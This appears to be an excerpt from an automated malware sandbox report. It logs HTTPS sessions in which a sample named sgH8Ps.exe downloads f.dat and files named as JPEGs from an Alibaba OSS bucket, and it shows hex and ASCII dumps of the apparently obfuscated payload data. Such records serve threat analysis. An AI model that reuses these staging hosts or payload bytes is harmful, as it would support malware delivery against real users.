2025-01-02 11:15:15 UTC	4096	IN	Data Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw98
2025-01-02 11:15:16 UTC	4096	IN	Data Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAqV
2025-01-02 11:15:16 UTC	4096	IN	Data Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2025-01-02 11:15:16 UTC	4096	IN	Data Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3 Data Ascii: ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2025-01-02 11:15:16 UTC	4096	IN	Data Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39 Data Ascii: t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
2025-01-02 11:15:16 UTC	4096	IN	Data Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2025-01-02 11:15:16 UTC	955	IN	Data Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49992	118.178.60.9	443	6196	C:\Users\user\Documents\sgH8Ps.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:15:18 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:15:19 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:15:18 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 677675466FB42B353797339F Accept-Ranges: bytes ETag: "E54C4296F011EC91D935AA353C936E34" Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11142793972884948456 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5UxClvAR7JHZNao1PJNuNA== x-oss-server-time: 1
2025-01-02 11:15:19 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49993	118.178.60.9	443	6196	C:\Users\user\Documents\sgH8Ps.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:15:20 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:15:20 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:15:20 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 67767548A0BE37383714D662 Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 3
2025-01-02 11:15:20 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-02 11:15:20 UTC	4096	IN	Data Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96 Data Ascii: \|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2025-01-02 11:15:20 UTC	4096	IN	Data Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81 Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2025-01-02 11:15:20 UTC	4096	IN	Data Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4 Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2025-01-02 11:15:20 UTC	4096	IN	Data Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1 Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2025-01-02 11:15:20 UTC	4096	IN	Data Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47 Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
2025-01-02 11:15:20 UTC	4096	IN	Data Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
2025-01-02 11:15:20 UTC	4096	IN	Data Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2025-01-02 11:15:20 UTC	4096	IN	Data Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81 Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2025-01-02 11:15:20 UTC	4096	IN	Data Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49995	118.178.60.9	443	6196	C:\Users\user\Documents\sgH8Ps.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:15:22 UTC	115	OUT	GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:15:22 UTC	548	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:15:22 GMT Content-Type: image/jpeg Content-Length: 4859125 Connection: close x-oss-request-id: 6776754AA966993037DC0532 Accept-Ranges: bytes ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02" Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9060732723227198118 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7myj7qf5scgQWa71cKKMAg== x-oss-server-time: 11
